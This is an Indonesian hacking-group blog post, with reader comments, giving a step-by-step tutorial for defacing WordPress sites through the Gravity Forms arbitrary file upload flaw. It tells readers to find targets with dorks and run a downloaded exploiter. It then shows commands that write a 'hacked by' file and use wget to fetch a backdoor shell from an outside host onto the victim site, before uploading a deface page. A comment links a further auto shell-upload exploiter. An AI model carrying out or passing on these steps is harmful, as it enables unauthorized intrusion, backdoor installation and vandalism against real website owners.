Cara Deface Dengan WordPress Gravity Form Arbitrary File Upload - Exploiter


Hello sobat N45HT, setelah sekian lama ane gak posting, sekarang posting lagi nehh. Kali ini ane mau posting tengang Deface, Yup cara deface dengan WordPress Gravity Form Arbitrary File Upload - Exploiter. oke lahh, gak usah banyak omong lagi, langsung simak aja tutorial nya..


  • Alat Perang :
  • Yang pertama, ente download dulu xploiter nya, simpan dengan ekstensi.php
  • Lalu ente ngedork pake dork diatas, kalo udah dapet target, masukin exploit nya. contoh : target.com/index.php?gf_page=upload atau target.com/[path]/index.php?gf_page=upload
kalo vuln seperti ini
 

  •  Buka exploiter yang ente download tadi, masukin targetnya (lihat gambar, biar lebih jelas)


  • Ketikkan perintah ini untuk upload file.txt > echo "[isi dari file]">namafile.txt. contoh : echo "hacked by ShinChan">shinchan.txt

  • Nahh berhasil kan? sekarang kita coba upload shell backdoor/script deface.

  • ketikkan perintah ini > wget -O nama-file.php http://target.com/script-shell.txt. contoh : wget -O shinchan.php http://mutiaramedicalservice.com/s.txt

  • Tadaa? bisa kan?

  • Sekarang tinggal upload script deface kalian, lalu tinggal di mirror in dahh.


Oke, sekian dulu tutorial hari ini. Kalo ada yang kurang jelas bisa langsung komentar dibawah atau join ke grup N45HT, Okelahh sekian dulu tutorial hari ini, semoga dapat menambah ilmu sobat. Terimakasih sudah berkunjung :)

6 comments

waktu aku jalanin exploit di cmd yang muncul haya tulisan gravity falls doang itu keanapa ya bang


coba kamu pake exploiter yang ini http://www.2bdoc.com/video/wordpress-gravity-forms-auto-shell-upload-v625221.html

apakah file harus satu folder dengan exploit?


EmoticonEmoticon